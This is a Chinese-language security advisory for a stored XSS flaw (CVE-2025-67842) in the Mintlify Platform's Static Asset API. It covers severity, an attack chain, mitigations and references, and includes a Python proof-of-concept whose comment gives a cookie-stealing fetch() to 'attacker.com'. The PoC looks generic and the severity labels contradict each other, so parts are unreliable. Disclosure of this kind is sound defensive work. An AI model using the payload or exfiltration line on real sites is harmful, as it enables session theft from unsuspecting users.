CVE-2025-67842 Mintlify Platform 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67842

漏洞类型

存储型XSS跨站脚本攻击

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mintlify Platform

漏洞概述

CVE-2025-67842是Mintlify Platform存在的一个高危存储型跨站脚本（Stored XSS）漏洞。该漏洞位于平台的Static Asset API中，在2025年11月15日之前的版本中，攻击者可以通过subdomain参数注入任意Web脚本或HTML。由于Mintlify平台的多租户架构存在安全缺陷，任何租户的静态资产都可以被其他租户的文档站点加载和显示，这使得攻击者能够实现跨租户的XSS攻击。攻击者首先注册一个带有恶意脚本的子域名，利用平台漏洞使其资产在其他租户的文档页面上被加载执行。当其他用户访问这些被污染的文档站点时，恶意脚本会在用户浏览器中自动执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击或进一步的网络渗透。此漏洞CVSS评分为6.4，属于中危级别，但考虑到其可实现自动化大规模攻击且无需目标用户交互，仍需尽快修复。

技术细节

该漏洞的根本原因在于Mintlify Static Asset API对subdomain参数缺乏有效的输入验证和安全过滤。平台采用多租户架构设计，各租户可以自定义子域名来托管其文档站点。在资产加载逻辑中，API允许通过subdomain参数指定资产来源，但未对参数值进行严格的安全检查。攻击者可以注册一个包含恶意JavaScript代码的子域名（如 xss<script>alert(document.cookie)</script>.yourdomain.com），平台在处理该子域名时会将其解析并加载相关资产。由于资产服务逻辑存在缺陷，带有XSS payload的资产会被存储并分发到其他租户的文档页面。当受害者访问这些页面时，浏览器会执行注入的恶意脚本。攻击者可以利用此漏洞窃取用户会话Cookie、进行CSRF攻击、植入钓鱼页面或重定向用户到恶意站点。漏洞影响所有在2025-11-15之前未更新版本的Mintlify Platform用户。

攻击链分析

STEP 1

步骤1

攻击者注册一个包含XSS payload的恶意子域名（如 xss<script>标签. attacker.com）

STEP 2

步骤2

攻击者通过Mintlify Static Asset API发送带有恶意subdomain参数的请求

STEP 3

步骤3

API未对subdomain参数进行充分验证和过滤，直接加载并存储攻击者指定的资产

STEP 4

步骤4

由于多租户架构缺陷，带有恶意脚本的资产被分发到其他租户的文档页面

STEP 5

步骤5

受害者访问被污染的文档站点时，浏览器自动执行注入的恶意JavaScript代码

STEP 6

步骤6

攻击者成功窃取用户Cookie、会话令牌或其他敏感信息，或执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67842 Mintlify XSS PoC
import requests
import urllib.parse

TARGET_URL = "https://api.mintlify.com/v1/static-asset"
MALICIOUS_SUBDOMAIN = "xss<script>alert(document.cookie)</script>.attacker.com"

def exploit_mintlify_xss(target_documentation_site):
    """
    Exploit Mintlify Platform XSS via subdomain parameter injection
    This PoC demonstrates how an attacker can inject malicious scripts
    through the Static Asset API's subdomain parameter.
    """
    # Step 1: Prepare malicious subdomain payload
    payload = {
        "subdomain": MALICIOUS_SUBDOMAIN,
        "path": "/",
        "tenant_id": "victim-tenant"
    }
    
    # Step 2: Send crafted request to Static Asset API
    response = requests.get(
        TARGET_URL,
        params=payload,
        headers={
            "User-Agent": "Mozilla/5.0",
            "Referer": target_documentation_site
        }
    )
    
    print(f"[*] Request sent to {TARGET_URL}")
    print(f"[*] Payload: {urllib.parse.urlencode(payload)}")
    print(f"[*] Response Status: {response.status_code}")
    
    # Step 3: The malicious asset is now served on victim's site
    # When users visit the victim's documentation, the XSS will execute
    
    return response

# Example attack scenario
VICTIM_SITE = "https://docs.victim-company.com"
exploit_mintlify_xss(VICTIM_SITE)

# After exploitation, visiting VICTIM_SITE will execute:
# alert(document.cookie)
# Attackers can replace this with cookie stealing:
# <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

影响范围

Mintlify Platform < 2025-11-15

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）暂时禁用自定义子域名功能；2）实施严格的子域名格式验证，仅允许字母数字和连字符；3）配置Web应用防火墙（WAF）规则过滤subdomain参数中的特殊字符如<>、"、'等；4）启用Content-Security-Policy响应头限制脚本执行；5）监控和审查所有通过API加载的外部资产。但在生产环境中，最有效的解决方案仍是尽快升级到官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67842
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67842
3 Details https://www.cvedetails.com/cve/CVE-2025-67842/
4 VulDB https://vuldb.com/cve/CVE-2025-67842
5 Link https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28
6 Link https://heartbreak.ing
7 Link https://kibty.town/blog/mintlify/
8 Link https://news.ycombinator.com/item?id=46317098
9 Link https://www.mintlify.com/blog/working-with-security-researchers-november-2025
10 Link https://www.mintlify.com/docs/changelog
11 Link https://kibty.town/blog/mintlify/